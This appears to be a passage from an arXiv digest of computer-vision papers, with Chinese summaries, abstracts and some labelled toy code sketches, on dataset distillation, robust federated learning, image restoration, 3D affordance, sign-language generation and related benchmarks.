【速读】:该论文旨在解决大规模视觉识别系统中因数据集成本高、获取困难而导致的训练效率与可扩展性问题。现有基于扩散模型的数据集蒸馏方法存在理论依据不足、难以扩展至高数据量以及无法在无原始数据场景下应用等缺陷。解决方案的关键在于提出一个名为Dataset Concentration (DsCo) 的新框架,其核心是通过扩散模型驱动的Noise-Optimization (NOpt) 方法合成少量但具有代表性的样本,并引入“Doping”策略——将原始数据中精选样本与合成样本混合,从而突破数据蒸馏固有的效率瓶颈。该方法在有/无原始数据场景下均适用,在低数据量时达到当前最优性能,并能高效扩展至高数据量,实现数据集规模减半而性能无损。
链接: https://arxiv.org/abs/2603.27987
作者: Tongfei Liu,Yufan Liu,Bing Li,Weiming Hu
机构: Chinese Academy of Sciences (中国科学院); Institute of Automation, Chinese Academy of Sciences (中国科学院自动化研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:The high cost and accessibility problem associated with large datasets hinder the development of large-scale visual recognition systems. Dataset Distillation addresses these problems by synthesizing compact surrogate datasets for efficient training, storage, transfer, and privacy preservation. The existing state-of-the-art diffusion-based dataset distillation methods face three issues: lack of theoretical justification, poor efficiency in scaling to high data volumes, and failure in data-free scenarios. To address these issues, we establish a theoretical framework that justifies the use of diffusion models by proving the equivalence between dataset distillation and distribution matching, and reveals an inherent efficiency limit in the dataset distillation paradigm. We then propose a Dataset Concentration (DsCo) framework that uses a diffusion-based Noise-Optimization (NOpt) method to synthesize a small yet representative set of samples, and optionally augments the synthetic data via “Doping”, which mixes selected samples from the original dataset with the synthetic samples to overcome the efficiency limit of dataset distillation. DsCo is applicable in both data-accessible and data-free scenarios, achieving SOTA performances for low data volumes, and it extends well to high data volumes, where it nearly reduces the dataset size by half with no performance degradation.
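The "Doping" strategy augments the synthetic set with selected real samples to break past the distillation efficiency limit. The abstract does not specify the selection rule, so the sketch below uses a hypothetical score function as a stand-in for how such mixing could look:

```python
def dope(synthetic, real, ratio=0.5, score=None):
    """Augment a synthetic dataset with the top-scoring real samples ('Doping').
    `score` ranks real samples; this selection rule is hypothetical, not the paper's."""
    k = int(len(synthetic) * ratio)
    chosen = sorted(real, key=score, reverse=True)[:k]
    return synthetic + chosen

synthetic = ["s0", "s1", "s2", "s3"]
real = ["r0", "r1", "r2", "r3", "r4"]
# Toy score: the numeric suffix, so r4 and r3 are "most representative"
mixed = dope(synthetic, real, ratio=0.5, score=lambda s: int(s[1:]))
print(mixed)  # ['s0', 's1', 's2', 's3', 'r4', 'r3']
```

The resulting mixed set is what the downstream model would train on in the data-accessible scenario; in the data-free scenario only the synthetic portion is available.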
[CV-97] FedFG: Privacy-Preserving and Robust Federated Learning via Flow-Matching Generation
【速读】:该论文旨在解决联邦学习(Federated Learning, FL)中隐私保护不足与模型聚合鲁棒性差的问题,即传统FL算法在面对数据泄露风险和中毒攻击(poisoning attacks)时存在安全漏洞。其解决方案的关键在于提出FedFG框架,通过客户端侧的特征解耦(私有特征提取器与公共分类器分离)和基于流匹配生成(flow-matching generation)的隐私保护机制,使客户端在上传过程中用生成器替代真实特征提取器,从而保护原始私有数据的同时学习数据分布近似;服务器端则引入基于合成样本的客户端更新验证机制与新型鲁棒聚合策略,有效抵御恶意客户端发起的中毒攻击,并提升全局模型的准确性与稳定性。
链接: https://arxiv.org/abs/2603.27986
作者: Ruiyang Wang,Rong Pan,Zhengan Yao
机构: Sun Yat-sen University (中山大学); Institute of Advanced Studies Hong Kong (香港中山大学高等研究院)
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:Federated learning (FL) enables distributed clients to collaboratively train a global model using local private data. Nevertheless, recent studies show that conventional FL algorithms still exhibit deficiencies in privacy protection, and the server lacks a reliable and stable aggregation rule for updating the global model. This situation creates opportunities for adversaries: on the one hand, they may eavesdrop on uploaded gradients or model parameters, potentially leaking benign clients’ private data; on the other hand, they may compromise clients to launch poisoning attacks that corrupt the global model. To balance accuracy and security, we propose FedFG, a robust FL framework based on flow-matching generation that simultaneously preserves client privacy and resists sophisticated poisoning attacks. On the client side, each local network is decoupled into a private feature extractor and a public classifier. Each client is further equipped with a flow-matching generator that replaces the extractor when interacting with the server, thereby protecting private features while learning an approximation of the underlying data distribution. Complementing the client-side design, the server employs a client-update verification scheme and a novel robust aggregation mechanism driven by synthetic samples produced by the flow-matching generator. Experiments on MNIST, FMNIST, and CIFAR-10 demonstrate that, compared with prior work, our approach adapts to multiple attack strategies and achieves higher accuracy while maintaining strong privacy protection.
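The server-side verification-plus-aggregation idea can be caricatured in a few lines: score each client update on held-out synthetic samples, discard updates that fail the check, and average the rest. This is a deliberately simplified stand-in (the threshold rule and loss function below are assumptions, not FedFG's actual mechanism):

```python
def robust_aggregate(updates, val_loss, threshold):
    """Average only the client updates whose loss on server-side synthetic
    samples stays below a threshold (simplified verification-based filtering)."""
    kept = [u for u in updates if val_loss(u) <= threshold]
    if not kept:
        raise ValueError("no client update passed verification")
    return [sum(vals) / len(kept) for vals in zip(*kept)]

# Two benign clients and one poisoned client submitting 2-d updates
updates = [[1.0, 1.0], [1.1, 0.9], [9.0, -9.0]]
agg = robust_aggregate(updates, val_loss=lambda u: abs(u[0] - 1.0), threshold=0.5)
print(agg)  # ≈ [1.05, 0.95]; the poisoned update is filtered out
```

A plain unweighted mean over all three updates would instead be dragged to [3.7, -2.37], which is the failure mode such verification is meant to prevent.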
[CV-98] RetinexDualV2: Physically-Grounded Dual Retinex for Generalized UHD Image Restoration
【速读】:该论文旨在解决超高清(Ultra-High-Definition, UHD)图像复原中多种复杂退化类型(如雨滴、低光照和噪声)的统一建模与高效处理问题。现有方法通常针对特定退化设计专用结构,缺乏通用性和物理可解释性。其解决方案的关键在于提出RetinexDualV2框架,通过任务特异性物理接地模块(Task-Specific Physical Grounding Module, TS-PGM)提取退化感知先验(如雨滴掩码和暗通道),并利用新颖的物理条件多头自注意力机制(Physical-conditioned Multi-head Self-Attention, PC-MSA)将这些先验显式引导至Retinex分解网络,从而实现反射与光照分量的鲁棒校正。该物理约束机制使单一架构能够无缝适应多种复杂退化,无需任务特定结构调整,显著提升了模型的泛化能力与性能。
链接: https://arxiv.org/abs/2603.27979
作者: Mohab Kishawy,Jun Chen
机构: McMaster University (麦克马斯特大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We propose RetinexDualV2, a unified, physically grounded dual-branch framework for diverse Ultra-High-Definition (UHD) image restoration. Unlike generic models, our method employs a Task-Specific Physical Grounding Module (TS-PGM) to extract degradation-aware priors (e.g., rain masks and dark channels). These explicitly guide a Retinex decomposition network via a novel Physical-conditioned Multi-head Self-Attention (PC-MSA) mechanism, enabling robust reflection and illumination correction. This physical conditioning allows a single architecture to handle various complex degradations seamlessly, without task-specific structural modifications. RetinexDualV2 demonstrates exceptional generalizability, securing 4th place in the NTIRE 2026 Day and Night Raindrop Removal Challenge and 5th place in the Joint Noise Low-light Enhancement (JNLLIE) Challenge. Extensive experiments confirm the state-of-the-art performance and efficiency of our physically motivated approach.
[CV-99] AffordMatcher: Affordance Learning in 3D Scenes from Visual Signifiers CVPR2026
【速读】:该论文旨在解决场景级功能交互区域(affordance regions)的识别难题,即如何在复杂室内场景中准确地从几何结构、视觉信息和语义标签中学习并定位可交互区域。现有方法多聚焦于单个物体层面的感知,难以有效扩展至场景级理解。其解决方案的关键在于提出AffordBridge数据集与AffordMatcher方法:前者提供了包含291,637条功能性交互标注的高分辨率点云场景数据;后者通过建立图像与点云之间实例级别的语义对应关系,实现基于视觉标志符(visual signifiers)的关键点匹配,从而更精确地识别出具有功能意义的交互区域。
链接: https://arxiv.org/abs/2603.27970
作者: Nghia Vu,Tuong Do,Khang Nguyen,Baoru Huang,Nhat Le,Binh Xuan Nguyen,Erman Tjiputra,Quang D. Tran,Ravi Prakash,Te-Chuan Chiu,Anh Nguyen
机构: University of Liverpool (利物浦大学); AIOZ Ltd. (AIOZ有限公司); National Tsing Hua University (台湾清华大学); MBZUAI; University of Western Australia (西澳大利亚大学); Indian Institute of Science (印度科学研究所); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 14 pages. Accepted to CVPR 2026
Abstract:Affordance learning is a complex challenge in many applications, where existing approaches primarily focus on the geometric structures, visual knowledge, and affordance labels of objects to determine interactable regions. However, extending this learning capability to a scene is significantly more complicated, as incorporating object- and scene-level semantics is not straightforward. In this work, we introduce AffordBridge, a large-scale dataset with 291,637 functional interaction annotations across 685 high-resolution indoor scenes in the form of point clouds. Our affordance annotations are complemented by RGB images that are linked to the same instances within the scenes. Building upon our dataset, we propose AffordMatcher, an affordance learning method that establishes coherent semantic correspondences between image-based and point cloud-based instances for keypoint matching, enabling a more precise identification of affordance regions based on cues, so-called visual signifiers. Experimental results on our dataset demonstrate the effectiveness of our approach compared to other methods.
[CV-100] Hg-I2P: Bridging Modalities for Generalizable Image-to-Point-Cloud Registration via Heterogeneous Graphs CVPR2026
【速读】:该论文旨在解决图像到点云(Image-to-point-cloud, I2P)配准中因模态差异导致的特征判别性与泛化能力不足的问题,尤其在未见场景下性能显著下降。其核心解决方案是提出一种异构图嵌入方法(Hg-I2P),关键在于构建一个连接2D图像分割区域与3D点云区域的异构图(heterogeneous graph),通过多路径特征关系挖掘实现跨模态特征的精炼与自适应调整,并利用图结构中的顶点与边一致性约束来剔除不可靠对应关系,从而提升特征判别力和配准精度。
链接: https://arxiv.org/abs/2603.27969
作者: Pei An,Junfeng Ding,Jiaqi Yang,Yulong Wang,Jie Ma,Liangliang Nan
机构: Huazhong University of Science and Technology (华中科技大学); Northwestern Polytechnical University (西北工业大学); Huazhong Agricultural University (华中农业大学); Delft University of Technology (代尔夫特理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:Image-to-point-cloud (I2P) registration aims to align 2D images with 3D point clouds by establishing reliable 2D-3D correspondences. The drastic modality gap between images and point clouds makes it challenging to learn features that are both discriminative and generalizable, leading to severe performance drops in unseen scenarios. We address this challenge by introducing a heterogeneous graph that enables refining both cross-modal features and correspondences within a unified architecture. The proposed graph represents a mapping between segmented 2D and 3D regions, which enhances cross-modal feature interaction and thus improves feature discriminability. In addition, modeling the consistency among vertices and edges within the graph enables pruning of unreliable correspondences. Building on these insights, we propose a heterogeneous graph embedded I2P registration method, termed Hg-I2P. It learns a heterogeneous graph by mining multi-path feature relationships, adapts features under the guidance of heterogeneous edges, and prunes correspondences using graph-based projection consistency. Experiments on six indoor and outdoor benchmarks under cross-domain setups demonstrate that Hg-I2P significantly outperforms existing methods in both generalization and accuracy. Code is released on this https URL.
[CV-101] Learning Multi-View Spatial Reasoning from Cross-View Relations CVPR2026
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在多视角空间推理能力上的不足,这是其在具身人工智能(Embodied AI)系统中理解三维环境和跨视角操作物体的关键瓶颈。现有VLMs虽在单视图任务上表现优异,但缺乏对不同视角间空间关系的建模能力。解决方案的核心是提出一个大规模数据集Cross-View Relations (XVR),包含10万条视觉-问题-答案样本,源自1.8万个多样化3D场景和7万条机器人操作轨迹,涵盖三类基础空间推理任务:对应关系(Correspondence)、验证(Verification)和定位(Localization)。通过在XVR上微调VLMs,显著提升了在MindCube和RoboSpatial等多视角与机器人空间推理基准上的性能,并进一步增强Vision-Language-Action模型在RoboCasa任务中的成功率,证明了显式训练跨视角空间关系对多视角推理能力和现实机器人操作的迁移有效性。
链接: https://arxiv.org/abs/2603.27967
作者: Suchae Jeong,Jaehwi Song,Haeone Lee,Hanna Kim,Jian Kim,Dongjun Lee,Dong Kyu Shin,Changyeon Kim,Dongyoon Hahm,Woogyeol Jin,Juheon Choi,Kimin Lee
机构: KAIST(韩国科学技术院); Config; Hanyang University(汉阳大学); Yonsei University(延世大学); Seoul National University(首尔国立大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:Vision-language models (VLMs) have achieved impressive results on single-view vision tasks, but lack the multi-view spatial reasoning capabilities essential for embodied AI systems to understand 3D environments and manipulate objects across different viewpoints. In this work, we introduce Cross-View Relations (XVR), a large-scale dataset designed to teach VLMs spatial reasoning across multiple views. XVR comprises 100K vision-question-answer samples derived from 18K diverse 3D scenes and 70K robotic manipulation trajectories, spanning three fundamental spatial reasoning tasks: Correspondence (matching objects across views), Verification (validating spatial relationships), and Localization (identifying object positions). VLMs fine-tuned on XVR achieve substantial improvements on established multi-view and robotic spatial reasoning benchmarks (MindCube and RoboSpatial). When integrated as backbones in Vision-Language-Action models, XVR-trained representations improve success rates on RoboCasa. Our results demonstrate that explicit training on cross-view spatial relations significantly enhances multi-view reasoning and transfers effectively to real-world robotic manipulation.
[CV-102] ExFusion: Efficient Transformer Training via Multi-Experts Fusion
【速读】:该论文旨在解决混合专家(Mixture-of-Experts, MoE)模型在训练和部署过程中因参数量大、计算资源消耗高以及存储开销显著而带来的效率瓶颈问题。其解决方案的关键在于提出一种名为ExFusion的预训练方法,通过在初始化阶段将Transformer中的前馈网络(Feed-Forward Network, FFN)重构为多专家结构,并为每个专家分配可学习权重;在训练过程中,这些权重使多个专家能够融合为一个等效于原始FFN的统一专家,从而在不增加额外计算负担的前提下引入多专家能力;训练完成后,利用学习到的权重将多专家整合为单一专家,彻底消除部署时的额外存储与计算开销,实现了高效且高性能的Transformer训练与应用。
链接: https://arxiv.org/abs/2603.27965
作者: Jiacheng Ruan,Daize Dong,Xiaoye Qu,Tong Zhu,Ting Liu,Yuzhuo Fu,Yu Cheng,Suncheng Xiang
机构: Shanghai Jiao Tong University (上海交通大学); Shanghai Artificial Intelligence Laboratory (上海人工智能实验室); Huazhong University of Science and Technology (华中科技大学); Soochow University (苏州大学); Chinese University of Hong Kong (香港中文大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by IEEE TMM2026
Abstract:Mixture-of-Experts (MoE) models substantially improve performance by increasing the capacity of dense architectures. However, directly training MoE models requires considerable computational resources and introduces extra overhead in parameter storage and deployment. Therefore, it is critical to develop an approach that leverages the multi-expert capability of MoE to enhance performance while incurring minimal additional cost. To this end, we propose a novel pre-training approach, termed ExFusion, which improves the efficiency of Transformer training through multi-expert fusion. Specifically, during the initialization phase, ExFusion upcycles the feed-forward network (FFN) of the Transformer into a multi-expert configuration, where each expert is assigned a weight for later parameter fusion. During training, these weights allow multiple experts to be fused into a single unified expert equivalent to the original FFN, which is subsequently used for forward computation. As a result, ExFusion introduces multi-expert characteristics into the training process while incurring only marginal computational cost compared to standard dense training. After training, the learned weights are used to integrate multi-experts into a single unified expert, thereby eliminating additional overhead in storage and deployment. Extensive experiments on a variety of computer vision and natural language processing tasks demonstrate the effectiveness of the proposed method.
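The key trick in ExFusion is that weighted experts can be fused back into a single layer. For purely linear experts this equivalence is exact: applying the weighted sum of the parameter matrices once gives the same output as applying each expert and mixing the outputs with the same weights. A toy numpy illustration (the paper's experts are full nonlinear FFNs, so this only conveys the linear-layer intuition behind the fusion):

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.normal(size=(4, 8))                            # a batch of inputs
experts = [rng.normal(size=(8, 8)) for _ in range(3)]  # three linear "experts"
alpha = np.array([0.2, 0.3, 0.5])                      # fusion weights (learnable in ExFusion)

# Fuse parameters into one matrix, then apply once
fused = sum(a * W for a, W in zip(alpha, experts))
y_fused = x @ fused

# Equivalent: apply each expert separately and mix the outputs
y_mix = sum(a * (x @ W) for a, W in zip(alpha, experts))
assert np.allclose(y_fused, y_mix)
```

This is why the fused model carries no extra storage or compute at deployment: after training, only the single `fused` matrix needs to be kept.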
[CV-103] MathGen: Revealing the Illusion of Mathematical Competence through Text-to-Image Generation
【速读】:该论文旨在解决生成式 AI(Generative AI)在数学视觉表达任务中的能力瓶颈问题,即如何准确地将数学解以图表、图像、几何构造和结构化符号布局等形式可视化呈现,而不仅仅是文本形式。其解决方案的关键在于构建了一个名为 MathGen 的严格基准测试集,包含 900 道涵盖七个核心数学领域的题目,并采用“Script-as-a-Judge”协议对每道题的生成结果进行可执行验证,从而实现确定性和客观的评估。这一设计使得模型在数学视觉生成任务上的性能得以量化比较,揭示了当前文本到图像(Text-to-Image, T2I)模型在结构化数学可视化任务中仍存在显著不足,尤其开放源代码模型表现极差,最高仅达 11%,而最优闭源模型也仅达到 42.0% 的整体准确率。
链接: https://arxiv.org/abs/2603.27959
作者: Ruiyao Liu,Hui Shen,Ping Zhang,Yunta Hsieh,Yifan Zhang,Jing Xu,Sicheng Chen,Junchen Li,Jiawei Lu,Jianing Ma,Jiaqi Mo,Qi Han,Zhen Zhang,Zhongwei Wan,Jing Xiong,Xin Wang,Ziyuan Liu,Hangrui Cao,Ngai Wong
机构: University of Pennsylvania (宾夕法尼亚大学); University of Michigan (密歇根大学); The Ohio State University (俄亥俄州立大学); USTC (中国科学技术大学); City University of Hong Kong (香港城市大学); University of Wisconsin (威斯康星大学); Independent (独立); UCSB (加州大学圣塔芭芭拉分校); University of Hong Kong (香港大学); Peking University (北京大学); Carnegie Mellon University (卡内基梅隆大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Modern generative models have demonstrated the ability to solve challenging mathematical problems. In many real-world settings, however, mathematical solutions must be expressed visually through diagrams, plots, geometric constructions, and structured symbolic layouts, where correctness depends on precise visual composition. Can generative models still do so when the answer must be rendered visually rather than written in text? To study this problem, we introduce MathGen, a rigorous benchmark of 900 problems spanning seven core domains, each paired with an executable verifier under a Script-as-a-Judge protocol for deterministic and objective evaluation. Experiments on representative open-source and proprietary text-to-image models show that mathematical fidelity remains a major bottleneck: even the best closed-source model reaches only 42.0% overall accuracy, while open-source models achieve just ~1-11%, often near 0% on structured tasks. Overall, current T2I models remain far from competent at even elementary mathematical visual generation.
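The Script-as-a-Judge protocol scores each generation with an executable, deterministic check rather than a human or model judge. A toy stand-in for such a verifier (the benchmark's actual scripts operate on rendered images; here a "rendering" is reduced to a list of bar heights to keep the idea self-contained):

```python
def script_judge(rendered_heights, expected_fn, xs, tol=0.05):
    """Deterministic 'Script-as-a-Judge' check: every rendered bar height must
    match the target function within a tolerance (toy image-level verifier)."""
    return all(abs(h - expected_fn(x)) <= tol for h, x in zip(rendered_heights, xs))

xs = [0, 1, 2, 3]
good = [0.0, 1.0, 4.0, 9.0]  # a correct rendering of y = x^2
bad = [0.0, 1.0, 4.0, 8.0]   # last bar drawn at the wrong height
print(script_judge(good, lambda x: x * x, xs))  # True
print(script_judge(bad, lambda x: x * x, xs))   # False
```

Because the judge is a script, the same generation always receives the same verdict, which is what makes the benchmark's accuracy numbers objective and reproducible.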
[CV-104] RehearsalNeRF: Decoupling Intrinsic Neural Fields of Dynamic Illuminations for Scene Editing
【速读】:该论文旨在解决神经辐射场(Neural Radiance Fields, NeRF)在动态光照变化下难以实现有效解耦的问题,尤其针对场景中主体辐射与自发光及光照颜色在时空域高度纠缠的挑战。其解决方案的关键在于引入一种名为 RehearsalNeRF 的新方法,该方法利用在稳定光照条件下(如排练舞台)预先捕获的场景数据,强制不同光照条件下的几何一致性;并通过一个可学习的光照向量来表征时间维度上的光照颜色,从而将投影的光照颜色从场景辐射中解耦出来。此外,该方法还通过光学流(optical flow)设计了一种新的正则化策略,为颜色解耦提供粗粒度监督,并能仅依赖现成的交互式掩码实现动态物体的重建与分离。
链接: https://arxiv.org/abs/2603.27948
作者: Changyeon Won,Hyunjun Jung,Jungu Cho,Seonmi Park,Chi-Hoon Lee,Hae-Gon Jeon
机构: GIST (光州科学技术院); CJ (CJ集团); Yonsei University (延世大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to the International Journal of Computer Vision (IJCV). Changyeon Won and Hyunjun Jung contributed equally to this work
Abstract:Although there has been significant progress in neural radiance fields, the issue of dynamic illumination changes remains unsolved. Different from relevant works that parameterize time-variant/-invariant components in scenes, subjects’ radiance is highly entangled with their own emitted radiance and lighting colors in spatio-temporal domain. In this paper, we present a new effective method to learn disentangled neural fields under the severe illumination changes, named RehearsalNeRF. Our key idea is to leverage scenes captured under stable lighting like rehearsal stages, easily taken before dynamic illumination occurs, to enforce geometric consistency between the different lighting conditions. In particular, RehearsalNeRF employs a learnable vector for lighting effects which represents illumination colors in a temporal dimension and is used to disentangle projected light colors from scene radiance. Furthermore, our RehearsalNeRF is also able to reconstruct the neural fields of dynamic objects by simply adopting off-the-shelf interactive masks. To decouple the dynamic objects, we propose a new regularization leveraging optical flow, which provides coarse supervision for the color disentanglement. We demonstrate the effectiveness of RehearsalNeRF by showing robust performances on novel view synthesis and scene editing under dynamic illumination conditions. Our source code and video datasets will be publicly available.
[CV-105] JaWildText: A Benchmark for Vision-Language Models on Japanese Scene Text Understanding
【速读】:该论文旨在解决现有多语言视觉-语言模型(Vision-Language Models, VLMs)评估基准在处理日语场景文本(scene text)时存在的不足,特别是未能充分涵盖日语特有的复杂性,如混合书写系统(mixed scripts)、频繁的垂直书写(vertical writing)以及远超拉丁字母的字符集规模。当前数据集主要聚焦于扫描文档,缺乏对真实世界场景文本(in-the-wild scene text)的覆盖。为此,作者提出 JaWildText——一个针对日语场景文本理解的诊断性基准,其关键在于构建了一个包含3,241个实例、112万标注字符、覆盖3,643种独特字符类型的高质量数据集,并设计了三个互补任务:密集场景文本视觉问答(Dense Scene Text Visual Question Answering, STVQA)、收据关键信息提取(Receipt Key Information Extraction, KIE)和手写体OCR(Handwriting OCR),分别考察模型在多文本证据推理、布局感知结构化提取及跨媒体与书写方向的页面级转录能力。该方案实现了对日语场景文本理解能力的细粒度、分层诊断,填补了领域空白。
链接: https://arxiv.org/abs/2603.27942
作者: Koki Maeda(1 and 2),Naoaki Okazaki(1 and 2) ((1) Institute of Science Tokyo, Tokyo, Japan, (2) Research and Development Center for Large Language Models, National Institute of Informatics, Tokyo, Japan)
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 18 pages
Abstract:Japanese scene text poses challenges that multilingual benchmarks often fail to capture, including mixed scripts, frequent vertical writing, and a character inventory far larger than the Latin alphabet. Although Japanese is included in several multilingual benchmarks, these resources do not adequately capture the language-specific complexities. Meanwhile, existing Japanese visual text datasets have primarily focused on scanned documents, leaving in-the-wild scene text underexplored. To fill this gap, we introduce JaWildText, a diagnostic benchmark for evaluating vision-language models (VLMs) on Japanese scene text understanding. JaWildText contains 3,241 instances from 2,961 images newly captured in Japan, with 1.12 million annotated characters spanning 3,643 unique character types. It comprises three complementary tasks that vary in visual organization, output format, and writing style: (i) Dense Scene Text Visual Question Answering (STVQA), which requires reasoning over multiple pieces of visual text evidence; (ii) Receipt Key Information Extraction (KIE), which tests layout-aware structured extraction from mobile-captured receipts; and (iii) Handwriting OCR, which evaluates page-level transcription across various media and writing directions. We evaluate 14 open-weight VLMs and find that the best model achieves an average score of 0.64 across the three tasks. Error analyses show recognition remains the dominant bottleneck, especially for kanji. JaWildText enables fine-grained, script-aware diagnosis of Japanese scene text capabilities, and will be released with evaluation code.
[CV-106] A Cross-Scale Decoder with Token Refinement for Off-Road Semantic Segmentation
【速读】:该论文旨在解决非公路场景(off-road environments)中语义分割面临的三大核心挑战:地形类别间类级相似性导致边界模糊、稀疏或细小结构(如狭窄通行缝隙)因监督信号不足而难以建模,以及现有解码器设计在细节保留与噪声抑制之间的权衡困境。解决方案的关键在于提出一种跨尺度解码器(cross-scale decoder),通过三个互补机制实现:1)全局-局部令牌精修模块,在紧凑瓶颈网格上整合语义上下文并借助边界感知正则化增强对模糊标注的鲁棒性;2)门控细节桥接机制,利用跨尺度注意力仅一次性注入细粒度结构线索,避免噪声累积同时保留边界与纹理信息;3)不确定性引导的类别感知点精修机制,选择性更新最不可靠像素,以最小计算开销提升罕见和模糊结构的分割精度。该框架实现了噪声鲁棒性与边界保持的平衡,显著优于现有方法且无需密集特征融合。
链接: https://arxiv.org/abs/2603.27931
作者: Seongkyu Choi,Jhonghyun An
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Off-road semantic segmentation is fundamentally challenged by irregular terrain, vegetation clutter, and inherent annotation ambiguity. Unlike urban scenes with crisp object boundaries, off-road environments exhibit strong class-level similarity among terrain categories, resulting in thick and uncertain transition regions that degrade boundary coherence and destabilize training. Rare or thin structures, such as narrow traversable gaps or isolated obstacles, further receive sparse and unreliable supervision and are easily overwhelmed by dominant background textures. Existing decoder designs either rely on low-scale bottlenecks that oversmooth fine structural details, or repeatedly fuse high-detail features, which tends to amplify annotation noise and incur substantial computational cost. We present a cross-scale decoder that explicitly addresses these challenges through three complementary mechanisms. First, a global–local token refinement module consolidates semantic context on a compact bottleneck lattice, guided by boundary-aware regularization to remain robust under ambiguous supervision. Second, a gated detail bridge selectively injects fine-scale structural cues only once through cross-scale attention, preserving boundary and texture information while avoiding noise accumulation. Third, an uncertainty-guided class-aware point refinement selectively updates the least reliable pixels, improving rare and ambiguous structures with minimal computational overhead. The resulting framework achieves noise-robust and boundary-preserving segmentation tailored to off-road environments, recovering fine structural details while maintaining deployment-friendly efficiency. Experimental results on standard off-road benchmarks demonstrate consistent improvements over prior approaches without resorting to heavy dense feature fusion.
[CV-107] ForestSim: A Synthetic Benchmark for Intelligent Vehicle Perception in Unstructured Forest Environments
【速读】:该论文旨在解决智能车辆在非结构化野外环境中进行鲁棒场景理解的难题,尤其是由于缺乏高质量、像素级标注的数据集,导致感知系统在森林等复杂地形中难以有效训练与评估。其解决方案的关键在于构建了一个高保真度的合成数据集 ForestSim,利用 Unreal Engine 与 Microsoft AirSim 结合生成了包含 2094 张逼真图像的多场景数据,覆盖 25 种不同环境、多个季节和植被密度,并提供 20 类与自主导航相关的像素级语义标签,从而为无道路环境下的语义分割模型提供了可扩展且可访问的训练与评测基础。
链接: https://arxiv.org/abs/2603.27923
作者: Pragat Wagle,Zheng Chen,Lantao Liu
机构: Indiana University(印第安纳大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Robust scene understanding is essential for intelligent vehicles operating in natural, unstructured environments. While semantic segmentation datasets for structured urban driving are abundant, the datasets for extremely unstructured wild environments remain scarce due to the difficulty and cost of generating pixel-accurate annotations. These limitations hinder the development of perception systems needed for intelligent ground vehicles tasked with forestry automation, agricultural robotics, disaster response, and all-terrain mobility. To address this gap, we present ForestSim, a high-fidelity synthetic dataset designed for training and evaluating semantic segmentation models for intelligent vehicles in forested off-road and no-road environments. ForestSim contains 2094 photorealistic images across 25 diverse environments, covering multiple seasons, terrain types, and foliage densities. Using Unreal Engine environments integrated with Microsoft AirSim, we generate consistent, pixel-accurate labels across 20 classes relevant to autonomous navigation. We benchmark ForestSim using state-of-the-art architectures and report strong performance despite the inherent challenges of unstructured scenes. ForestSim provides a scalable and accessible foundation for perception research supporting the next generation of intelligent off-road vehicles. The dataset and code are publicly available: Dataset: this https URL Code: this https URL
[CV-108] FlashSign: Pose-Free Guidance for Efficient Sign Language Video Generation
【速读】:该论文旨在解决现有手语视频生成模型依赖复杂中间姿态表示而导致灵活性与效率受限的问题。其核心解决方案在于提出一种无姿态(pose-free)的实时手语视频生成框架,通过基于扩散模型(diffusion-based approach)的端到端映射机制,直接将自然语言文本转化为手语视频,无需显式估计人体姿态;同时引入可训练滑动块注意力机制(Trainable Sliding Tile Attention, T-STA),在训练和推理阶段均集成可学习稀疏性,从而利用时空局部性模式加速推理过程,显著降低计算开销并保持高质量输出,使实时部署成为可能。
链接: https://arxiv.org/abs/2603.27915
作者: Liuzhou Zhang,Zeyu Zhang,Biao Wu,Luyao Tang,Zirui Song,Hongyang He,Renda Han,Guangzhen Yao,Huacan Wang,Ronghao Chen,Xiuying Chen,Guan Huang,Zheng Zhu
机构: HUST; GigaAI; UTS; HKU; MBZUAI; Warwick; TJU; NNU; UCAS; UTHealth Houston
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Sign language plays a crucial role in bridging communication gaps between the deaf and hard-of-hearing communities. However, existing sign language video generation models often rely on complex intermediate representations, which limits their flexibility and efficiency. In this work, we propose a novel pose-free framework for real-time sign language video generation. Our method eliminates the need for intermediate pose representations by directly mapping natural language text to sign language videos using a diffusion-based approach. We introduce two key innovations: (1) a pose-free generative model based on a state-of-the-art diffusion backbone, which learns implicit text-to-gesture alignments without pose estimation, and (2) a Trainable Sliding Tile Attention (T-STA) mechanism that accelerates inference by exploiting spatio-temporal locality patterns. Unlike previous training-free sparsity approaches, T-STA integrates trainable sparsity into both training and inference, ensuring consistency and eliminating the train-test gap. This approach significantly reduces computational overhead while maintaining high generation quality, making real-time deployment feasible. Our method increases video generation speed by 3.07x without compromising video quality. Our contributions open new avenues for real-time, high-quality, pose-free sign language synthesis, with potential applications in inclusive communication tools for diverse communities. Code: this https URL.
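注:T-STA 的可训练稀疏部分摘要中未给出细节,下面的 Python 草图仅示意"滑动块(tile)局部注意力掩码"这一稀疏模式本身;块大小、窗口参数以及按 tile 划分的方式均为示意性假设,并非论文的官方实现:

```python
import numpy as np

def sliding_tile_mask(n_tokens, tile=4, window=1):
    """构造布尔注意力掩码:每个 tile 只允许关注与自己相距
    不超过 window 个 tile 的 token(时空局部性稀疏模式)。"""
    mask = np.zeros((n_tokens, n_tokens), dtype=bool)
    for i in range(n_tokens):
        for j in range(n_tokens):
            # i // tile 与 j // tile 分别是两个 token 所在的 tile 编号
            if abs(i // tile - j // tile) <= window:
                mask[i, j] = True
    return mask
```

将该掩码与注意力得分逐元素相与,即可把二次方的全局注意力限制为近似线性的局部计算;可学习部分(如逐层调整窗口)此处未建模。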
[CV-109] Spatial Orthogonal Refinement for Robust RGB-Event Visual Object Tracking
